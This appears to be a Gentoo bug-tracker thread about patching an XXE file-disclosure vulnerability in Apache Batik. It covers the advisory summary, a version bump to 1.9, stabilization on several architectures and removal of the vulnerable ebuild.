From ${URL} : In Apache Batik before 1.9, files lying on the filesystem of the server which uses batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root a full compromise of the server - including confidential or sensitive files - would be possible. XXE can also be used to attack the availability of the server via denial of service as the references within a xml document can trivially trigger an amplification attack. References: https://xmlgraphics.apache.org/security.html http://seclists.org/oss-sec/2017/q2/85 @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
@ Maintainer(s): Please bump to >=dev-java/batik-1.9. I submitted a PR for review: https://github.com/gentoo/gentoo/pull/4850
Ping: From URL: Stefan Cornelius 2017-07-05 07:38:53 EDT Upstream bug: https://issues.apache.org/jira/browse/BATIK-1139 Patches: http://svn.apache.org/viewvc?view=revision&revision=1742892 http://svn.apache.org/viewvc?view=revision&revision=1743326 Gentoo Security Padawan ChrisADR
commit 2bd8da0fc9240f6d7a9163470e952e26126cf392 (HEAD -> master, origin/master, origin/HEAD) Author: Thomas Deutschmann <whissi@gentoo.org> AuthorDate: Sun Jun 4 20:49:47 2017 +0200 Commit: Patrice Clement <monsieurp@gentoo.org> CommitDate: Tue Aug 1 22:43:40 2017 +0200 dev-java/batik: version bump to 1.9. Gentoo-Bug: https://bugs.gentoo.org/616476 Package-Manager: Portage-2.3.5, Repoman-2.3.2 Closes: https://github.com/gentoo/gentoo/pull/4850 dev-java/batik/Manifest | 1 + dev-java/batik/batik-1.9.ebuild | 101 ++++++++++++++++++++++++++++++++++++++++ 2 files changed, 102 insertions(+) create mode 100644 dev-java/batik/batik-1.9.ebuild Please proceed.
@arches, please stabilize.
If bug #628812 isn't an issue (due to the security status) it's ok to mark stable for x86. Rdeps build as well against this version.
(In reply to Myckel Habets (work) from comment #5) > If bug #628812 isn't an issue (due to the security status) it's ok to mark > stable for x86. Rdeps build as well against this version. amd64 tested, same problem with tcl USE Flag, refer to bug #628812 for more details about the test
ppc64 stable
x86 stable
amd64 stable. Maintainer(s), please cleanup. Security, please vote.
GLSA Vote: No
The bug has been referenced in the following commit(s): https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=559cca9d8919f426d7cb1f7998c8d4e9fa3ee476 commit 559cca9d8919f426d7cb1f7998c8d4e9fa3ee476 Author: Patrice Clement <monsieurp@gentoo.org> AuthorDate: 2017-10-27 18:30:06 +0000 Commit: Patrice Clement <monsieurp@gentoo.org> CommitDate: 2017-10-27 18:30:06 +0000 dev-java/batik: remove vulnerable version. Bug: https://bugs.gentoo.org/616476 Package-Manager: Portage-2.3.8, Repoman-2.3.3 dev-java/batik/Manifest | 1 - dev-java/batik/batik-1.8-r3.ebuild | 124 ------------------------------------- 2 files changed, 125 deletions(-)}
